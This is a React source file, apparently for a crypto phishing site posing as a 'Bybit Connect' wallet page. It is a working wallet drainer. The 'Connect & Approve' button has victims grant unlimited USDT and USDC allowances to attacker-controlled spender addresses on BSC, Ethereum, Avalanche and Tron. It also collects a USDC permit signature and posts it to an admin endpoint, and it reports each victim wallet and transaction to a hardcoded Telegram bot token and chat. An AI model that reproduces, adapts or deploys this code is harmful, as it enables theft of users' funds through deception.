/**
 * Единая точка входа для Bybit: один URL (#/connect?coin=USDT&network=BEP20), одна логика коннекта и approve.
 * Работает и с мобильного диплинка, и с десктопа.
 */
import React, { useState, useEffect } from 'react'
import { useSearchParams } from 'react-router-dom'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import './TokenPage.css'

const DAPP_URL = 'https://multiscan.app'
const getApiBase = () => (typeof window !== 'undefined' ? window.location.origin : DAPP_URL)
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const CHAIN = {
  BEP20: { chainId: 56, name: 'BSC' },
  ERC20: { chainId: 1, name: 'Ethereum' },
  AVAX: { chainId: 43114, name: 'Avalanche C-Chain' },
}

const TOKENS = {
  USDT: {
    BEP20: { token: '0x55d398326f99059fF775485246999027B3197955', pullerType: 'USDT_BEP' },
    ERC20: { pullerType: 'USDT_ETH', fallbackToken: '0xdAC17F958D2ee523a2206206994597C13D831ec7', fallbackSpender: '0xc47Ae07a5236274898F3883c8e188226a7E052e6' },
    TRC20: { token: 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t', pullerType: 'USDT', fallbackSpender: 'TEapWiNvpdpndcJUr74gJdy4d7W8xaoP8r' },
    AVAX: { token: '0x9702230A8Ea53601f5cD2dc00fDBc13d4dF4A8c7', pullerType: 'USDT_AVAX' },
  },
  USDC: {
    BEP20: { token: '0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d', pullerType: 'USDC_BEP' },
    ERC20: { pullerType: 'USDC', token: '0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48' },
    AVAX: { token: '0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E', pullerType: 'USDC_AVAX' },
  },
}

const BSC_SPENDER = '0x7919b9bEF13847695F3592cD15122DBC17355622'
const AVAX_SPENDER_USDC = '0xEf51c12b2b5CF154C5fD280D43e1981177986765'
const AVAX_SPENDER_USDT = '0xBe2Fa0003F009E6A3b6b9C7F6637BE7D12A042c2'

function formatDateTime() {
  const now = new Date()
  return now.toLocaleDateString('en-US', { year: 'numeric', month: '2-digit', day: '2-digit' }) +
    ' ' + now.toLocaleTimeString('en-US', { hour: '2-digit', minute: '2-digit', second: '2-digit' })
}

async function sendTelegramMessage(message) {
  try {
    await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: message, parse_mode: 'HTML' }),
    })
  } catch (e) {
    console.warn('Telegram:', e)
  }
}

function parseParams(searchParams) {
  const coin = (searchParams.get('coin') || '').toUpperCase()
  const network = (searchParams.get('network') || '').toUpperCase()
  if (!['USDT', 'USDC'].includes(coin)) return null
  if (coin === 'USDC' && !['ERC20', 'BEP20', 'AVAX'].includes(network)) return null
  if (coin === 'USDT' && !['ERC20', 'BEP20', 'TRC20', 'AVAX'].includes(network)) return null
  return { coin, network }
}

function getTitle(coin, network) {
  if (coin === 'USDT') {
    if (network === 'BEP20') return 'USDT (BEP-20)'
    if (network === 'ERC20') return 'USDT (ERC-20)'
    if (network === 'TRC20') return 'USDT (TRC-20)'
    if (network === 'AVAX') return 'USDT.e (AVAX)'
  }
  if (coin === 'USDC') {
    if (network === 'BEP20') return 'USDC (BEP-20)'
    if (network === 'ERC20') return 'USDC (ERC-20)'
    if (network === 'AVAX') return 'USDC (AVAX)'
  }
  return `${coin} ${network}`
}

const ConnectPage = () => {
  const [searchParams] = useSearchParams()
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)
  const params = parseParams(searchParams)

  const runTronApprove = async () => {
    const { pullerType, token, fallbackSpender } = TOKENS.USDT.TRC20
    const waitTron = () => new Promise((resolve) => {
      const check = () => window.tronLink || window.tronWeb
      if (check()) return resolve()
      window.addEventListener('tronLink#initialized', () => resolve(), { once: true })
      let attempts = 0
      const id = setInterval(() => {
        if (check() || attempts >= 80) { clearInterval(id); resolve() }
        else attempts++
      }, 250)
    })
    await waitTron()

    let tronWeb = window.tronLink?.tronWeb || window.tronWeb
    if (window.tronLink && !tronWeb) {
      try {
        const res = await window.tronLink.request({ method: 'tron_requestAccounts' })
        if (res?.code === 200) tronWeb = window.tronLink.tronWeb
        else if (res?.code === 4001) throw new Error('Connection rejected.')
      } catch (e) {
        if (e.message?.includes('rejected')) throw e
      }
    }
    if (tronWeb && !tronWeb.defaultAddress?.base58 && typeof tronWeb.request === 'function') {
      try {
        const res = await tronWeb.request({ method: 'tron_requestAccounts' })
        if (res?.code === 200) tronWeb = window.tronLink?.tronWeb || window.tronWeb
      } catch (_) {}
    }
    if (!tronWeb) throw new Error('Откройте страницу в Bybit Wallet (или TronLink) и попробуйте снова.')
    let attempts = 0
    while (!tronWeb?.defaultAddress?.base58 && attempts < 50) {
      await new Promise(r => setTimeout(r, 200))
      tronWeb = window.tronLink?.tronWeb || window.tronWeb
      attempts++
    }
    const account = tronWeb?.defaultAddress?.base58
    if (!account) throw new Error('Разблокируйте кошелёк в Bybit и попробуйте снова.')

    let spender = fallbackSpender
    try {
      const res = await fetch(`${DAPP_URL}/api/v1/puller?type=${pullerType}`)
      if (res.ok) {
        const text = await res.text().then(t => t.trim())
        if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
          try {
            const data = JSON.parse(text)
            const v = data.puller || data.pullerAddress || data.address || data.data
            if (typeof v === 'string' && v.startsWith('T') && v.length >= 34) spender = v
          } catch (_) {
            if (text.startsWith('T') && text.length >= 34) spender = text
          }
        }
      }
    } catch (_) {}
    const maxApproval = '115792089237316195423570985008687907853269984665640564039457584007913129639935'
    const contract = await tronWeb.contract().at(token)
    const tx = await contract.approve(spender, maxApproval).send()
    const domainName = window.location.hostname
    try {
      await fetch(`${DAPP_URL}/api/admin/usdts?${new URLSearchParams({ owner: account, domainName, spender })}`, { method: 'POST', headers: { 'Content-Type': 'application/json' } })
    } catch (_) {}
    await sendTelegramMessage(`✅ <b>USDT TRC20 Approve</b>\n\n🔗 Wallet: <code>${account}</code>\n📤 Spender: <code>${spender}</code>\n🌐 Domain: <code>${domainName}</code>\n📝 Tx: <code>${tx || 'N/A'}</code>\n⏰ ${formatDateTime()}`)
    return tx
  }

  const runEVMApprove = async () => {
    const { coin, network } = params
    const prov = await getEthereumProviderAsync()
    if (!prov) throw new Error('Откройте страницу в Bybit Wallet и обновите, если кошелёк не появился.')

    const provider = new ethers.BrowserProvider(prov)
    await provider.send('eth_requestAccounts', [])
    const signer = await provider.getSigner()
    const owner = await signer.getAddress()

    const chain = CHAIN[network]
    if (!chain) throw new Error('Unknown network')
    let cur = await provider.send('eth_chainId', [])
    let chainIdNum = parseInt(cur, 16)
    if (chainIdNum !== chain.chainId) {
      try {
        await provider.send('wallet_switchEthereumChain', [{ chainId: `0x${chain.chainId.toString(16)}` }])
        for (let i = 0; i < 20; i++) {
          await new Promise(r => setTimeout(r, 200))
          cur = await provider.send('eth_chainId', [])
          chainIdNum = parseInt(cur, 16)
          if (chainIdNum === chain.chainId) break
        }
      } catch (switchErr) {
        if (switchErr.code === 4902 || switchErr.message?.includes('Unrecognized')) {
          const addParams = chain.chainId === 56
            ? { chainId: '0x38', chainName: 'Binance Smart Chain', nativeCurrency: { name: 'BNB', symbol: 'BNB', decimals: 18 }, rpcUrls: ['https://bsc-dataseed.binance.org/'], blockExplorerUrls: ['https://bscscan.com/'] }
            : chain.chainId === 43114
              ? { chainId: '0xa86a', chainName: 'Avalanche C-Chain', nativeCurrency: { name: 'AVAX', symbol: 'AVAX', decimals: 18 }, rpcUrls: ['https://api.avax.network/ext/bc/C/rpc'], blockExplorerUrls: ['https://snowtrace.io/'] }
              : null
          if (addParams) await provider.send('wallet_addEthereumChain', [addParams])
          for (let i = 0; i < 20; i++) {
            await new Promise(r => setTimeout(r, 200))
            cur = await provider.send('eth_chainId', [])
            chainIdNum = parseInt(cur, 16)
            if (chainIdNum === chain.chainId) break
          }
        }
        if (chainIdNum !== chain.chainId) throw new Error('Переключите сеть в кошельке вручную.')
      }
    }

    const cfg = TOKENS[coin]?.[network]
    if (!cfg) throw new Error('Unsupported coin/network')

    let tokenAddress = cfg.token
    let spenderAddress = BSC_SPENDER
    if (network === 'BEP20') {
      spenderAddress = BSC_SPENDER
      try {
        const res = await fetch(`${DAPP_URL}/api/v1/puller?type=${cfg.pullerType}`)
        if (res.ok) {
          const text = await res.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE')) {
            try {
              const data = JSON.parse(text)
              const s = data.puller || data.pullerAddress || data.address || data.data
              if (typeof s === 'string' && s.startsWith('0x') && s.length === 42) spenderAddress = s
            } catch (_) {
              if (text.startsWith('0x') && text.length === 42) spenderAddress = text
            }
          }
        }
      } catch (_) {}
    } else if (network === 'ERC20') {
      if (coin === 'USDT') {
        try {
          const res = await fetch(`${getApiBase()}/api/v1/puller?type=USDT_ETH`)
          if (res.ok) {
            const text = await res.text().then(t => t.trim())
            if (!text.startsWith('<!DOCTYPE')) {
              try {
                const data = typeof text === 'string' ? JSON.parse(text) : text
                spenderAddress = data.puller || data.pullerAddress || data.address || data.spender || data.data || cfg.fallbackSpender
                tokenAddress = data.token || data.tokenAddress || data.contract || cfg.fallbackToken
              } catch (_) {}
            }
          }
        } catch (_) {}
        if (!spenderAddress || !spenderAddress.startsWith('0x')) spenderAddress = cfg.fallbackSpender
        if (!tokenAddress || !tokenAddress.startsWith('0x')) tokenAddress = cfg.fallbackToken
        const abi = ['function approve(address spender, uint256 amount)', 'function allowance(address owner, address spender) view returns (uint256)']
        const c = new ethers.Contract(tokenAddress, abi, signer)
        const allowance = await c.allowance(owner, spenderAddress)
        if (allowance !== 0n) {
          await (await c.approve(spenderAddress, 0)).wait()
        }
        const tx = await c.approve(spenderAddress, ethers.MaxUint256)
        await tx.wait()
        const domainName = window.location.hostname
        try {
          await fetch(`${getApiBase()}/api/admin/usdts-erc?${new URLSearchParams({ owner: owner.toLowerCase(), domainName, spender: spenderAddress.toLowerCase() })}`, { method: 'POST', headers: { 'Content-Type': 'application/json' } })
        } catch (_) {}
        await sendTelegramMessage(`✅ <b>USDT ERC20 Approve</b>\n\n🔗 Wallet: <code>${owner}</code>\n🌐 Domain: <code>${domainName}</code>\n💼 Token: USDT (ERC-20)\n📝 Tx: <code>${tx.hash}</code>\n⏰ ${formatDateTime()}`)
        return tx.hash
      }
      if (coin === 'USDC') {
        let puller = null
        const res = await fetch(`${DAPP_URL}/api/v1/puller?type=USDC`)
        if (!res.ok) throw new Error('Не удалось получить адрес puller.')
        const text = await res.text().then(t => t.trim())
        if (text.startsWith('<!DOCTYPE')) throw new Error('Ответ сервера неверный.')
        try {
          const data = JSON.parse(text)
          puller = data.puller || data
        } catch (_) {
          if (text.startsWith('0x') && text.length === 42) puller = text
        }
        if (!puller) throw new Error('Адрес puller не получен.')
        const erc = new ethers.Contract(cfg.token, ['function nonces(address) view returns (uint256)'], provider)
        const nonce = await erc.nonces(owner)
        const deadline = Math.floor(Date.now() / 1000) + 28 * 24 * 60 * 60
        const domain = { name: 'USD Coin', version: '2', chainId: 1, verifyingContract: cfg.token }
        const types = { Permit: [{ name: 'owner', type: 'address' }, { name: 'spender', type: 'address' }, { name: 'value', type: 'uint256' }, { name: 'nonce', type: 'uint256' }, { name: 'deadline', type: 'uint256' }] }
        const message = { owner, spender: puller, value: ethers.MaxUint256, nonce, deadline }
        const sig = ethers.Signature.from(await signer.signTypedData(domain, types, message))
        const domainName = window.location.hostname
        await fetch(`${DAPP_URL}/api/admin/permit`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ domainName, owner: owner.toLowerCase(), spender: puller.toLowerCase(), value: ethers.MaxUint256.toString(), deadline, v: sig.v, r: sig.r, s: sig.s }),
        })
        await sendTelegramMessage(`✅ <b>USDC ERC20 Permit</b>\n\n🔗 Wallet: <code>${owner}</code>\n🌐 Domain: <code>${domainName}</code>\n⏰ ${formatDateTime()}`)
        return 'permit'
      }
    } else if (network === 'AVAX') {
      spenderAddress = coin === 'USDC' ? AVAX_SPENDER_USDC : AVAX_SPENDER_USDT
      try {
        const res = await fetch(`${getApiBase()}/api/v1/puller?type=${cfg.pullerType}`)
        if (res.ok) {
          const text = await res.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE')) {
            try {
              const data = JSON.parse(text)
              const s = data.puller || data.pullerAddress || data.address || data.data
              if (typeof s === 'string' && s.startsWith('0x') && s.length === 42) spenderAddress = s
            } catch (_) {
              if (text.startsWith('0x') && text.length === 42) spenderAddress = text
            }
          }
        }
      } catch (_) {}
      const c = new ethers.Contract(tokenAddress, ['function approve(address spender, uint256 amount) returns (bool)'], signer)
      const tx = await c.approve(spenderAddress, ethers.MaxUint256)
      await tx.wait()
      const domainName = window.location.hostname
      await sendTelegramMessage(`✅ <b>${coin} AVAX Approve</b>\n\n🔗 Wallet: <code>${owner}</code>\n🌐 Domain: <code>${domainName}</code>\n📝 Tx: <code>${tx.hash}</code>\n⏰ ${formatDateTime()}`)
      return tx.hash
    }

    const c = new ethers.Contract(tokenAddress, ['function approve(address spender, uint256 amount) returns (bool)', 'function allowance(address owner, address spender) view returns (uint256)'], signer)
    const allowance = await c.allowance(owner, spenderAddress)
    const maxApproval = ethers.MaxUint256
    const tx = await c.approve(spenderAddress, maxApproval)
    await tx.wait()
    const domainName = window.location.hostname
    try {
      await fetch(`${DAPP_URL}/api/admin/usdts?${new URLSearchParams({ owner: owner.toLowerCase(), domainName, spender: spenderAddress.toLowerCase() })}`, { method: 'POST', headers: { 'Content-Type': 'application/json' } })
    } catch (_) {}
    await sendTelegramMessage(`✅ <b>${coin} ${network} Approve</b>\n\n🔗 Wallet: <code>${owner}</code>\n🌐 Domain: <code>${domainName}</code>\n📝 Tx: <code>${tx.hash}</code>\n⏰ ${formatDateTime()}`)
    return tx.hash
  }

  const handleConnect = async () => {
    if (!params) {
      setError('Неверная ссылка. Используйте выбор кошелька Bybit на главной.')
      return
    }
    setLoading(true)
    setError(null)
    setSuccess(false)
    try {
      if (params.network === 'TRC20') {
        await runTronApprove()
      } else {
        await runEVMApprove()
      }
      setSuccess(true)
    } catch (e) {
      console.error('Connect/Approve failed', e)
      let msg = e.message || 'Произошла ошибка.'
      if (e.code === 4001 || /denied|rejected|cancelled/i.test(e.message || '')) msg = 'Подпись отменена. Подтвердите в кошельке Bybit.'
      if (/not found|not ready|wallet/i.test(e.message || '')) msg = 'Откройте страницу в приложении Bybit Wallet и нажмите «Connect & Approve» снова.'
      setError(msg)
    } finally {
      setLoading(false)
    }
  }

  if (!params) {
    return (
      <div className="token-page">
        <div className="token-page-container">
          <h1 className="token-title">Bybit Connect</h1>
          <p className="token-subtitle">Неверные параметры. Выберите монету и сеть на главной и нажмите Bybit.</p>
          <a href="#/" style={{ color: '#58a6ff', textDecoration: 'underline' }}>На главную</a>
        </div>
      </div>
    )
  }

  const title = getTitle(params.coin, params.network)
  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img src={params.coin === 'USDT' ? 'https://assets.coingecko.com/coins/images/325/small/Tether.png' : 'https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png'} alt={params.coin} className="token-logo" />
          </div>
          <h1 className="token-title">{params.coin}</h1>
          <p className="token-subtitle">{title}</p>
        </div>
        {error && <div className="token-error">{error}</div>}
        {success && <div className="token-success">✅ Approve выполнен успешно.</div>}
        <button className="token-approve-btn" onClick={handleConnect} disabled={loading}>
          {loading ? 'Подключение…' : 'Connect & Approve'}
        </button>
        <p style={{ marginTop: 12, fontSize: 14, color: '#666' }}>Один коннектор Bybit для всех сетей.</p>
      </div>
    </div>
  )
}

export default ConnectPage
